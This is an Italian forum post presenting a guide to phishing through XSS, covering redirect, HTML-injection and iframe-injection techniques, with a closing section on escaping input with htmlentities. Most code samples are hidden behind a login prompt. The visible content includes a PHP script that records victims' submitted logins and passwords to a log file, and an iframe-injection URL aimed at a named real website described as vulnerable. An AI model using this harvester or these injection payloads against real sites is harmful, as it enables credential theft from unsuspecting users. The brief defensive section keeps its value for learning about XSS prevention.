Toggle sidebar
  • Regolamento Macrocategoria DEV
    Prima di aprire un topic nella Macrocategoria DEV, è bene leggerne il suo regolamento. Sei un'azienda o un hosting/provider? Qui sono anche contenute informazioni per collaborare con Sciax2 ed ottenere l'accredito nella nostra community!

Guida XSS & Iframe Pishing

ErJeY

ErJeY

Utente Attivo
Autore del topic
10 Maggio 2010
379
0
Miglior risposta
0
XSS & Iframe Phishing
Introduzione:
In questa guida, vi illustrerò il phishing tramite XSS e iframe.
L' XSS offre l'opportunità di interagire con l'utenza che vede il sito vulnerabile (redirect, cookie e phishing, ecc.)
Qui potremo vedere:
● Redirect Phishing
● Html Inject Phishing
● Iframe Phishing
● Come bloccare queste vulnerabilità
Per contattarmi:
amato.p[MENTION=21474]hot[/MENTION]mail.it

XSS Redirect Phishing​
Questa prima tecnica consiste nel reindirizzare su una falsa pagina di login facendo credere alla vittima di essere sempre sul sito reale
Esempio:
- Sito vulnerabile:
Codice:
Perfavore, Entra oppure Registrati per vedere i codici!
- Xss redirect:
Codice:
Perfavore, Entra oppure Registrati per vedere i codici!
(ovviamente dovrete cambiare google.com col vostro sito)
Se il sito in questione contiene una xss fisica ovvero che rimane nel tempo possiamo inviarlo a tutti gli utenti senza che essi debbano andare sul link vulnerabile.

XSS Html Inject Phishing​
Quest'altra tecnica consiste nell'iniettare del codice html nella pagina vulnerabile
Esempio:
- Sito vulnerabile:
Codice:
Perfavore, Entra oppure Registrati per vedere i codici!
Xss Html inject:
Codice:
Perfavore, Entra oppure Registrati per vedere i codici!


(Il codice per la pagina pishing potrebbe essere questo:
<?php
$login = $_POST['login'];
$password = $_POST['Password'];
$open = fopen('log.htm', 'a+');
fputs($open, 'Login : ' . $login . '<br >' . '
Password : ' . $password . '<br >' . '<br >');
?>)

XSS Iframe Phishing​
Quest'ultima tecnica xss consiste nel far apparire un frame nella pagina facendo credere alla vittima che faccia parte di essa.

Esempio:
-Sito vulnerabile:
Codice:
Perfavore, Entra oppure Registrati per vedere i codici!
[xss/iframe]
-Iframe Pishing:
Codice:
Perfavore, Entra oppure Registrati per vedere i codici!

(Vi do un sito vulnerabile a questa tecnica: Http://www.romow.com/index.php?search="'><iframe src="http://google.Com"
height="300" width="800"></iframe>)

Come bloccare tutto ciò​
Codice vulnerabile:
Codice:
Perfavore, Entra oppure Registrati per vedere i codici!
Codice sicuro tramite l'uso di htmlentities:
Codice:
Perfavore, Entra oppure Registrati per vedere i codici!
Con questo è tutto e concludo.. byez!
 
Devi accedere o registrarti per rispondere qui.
 
 
Top
Indietro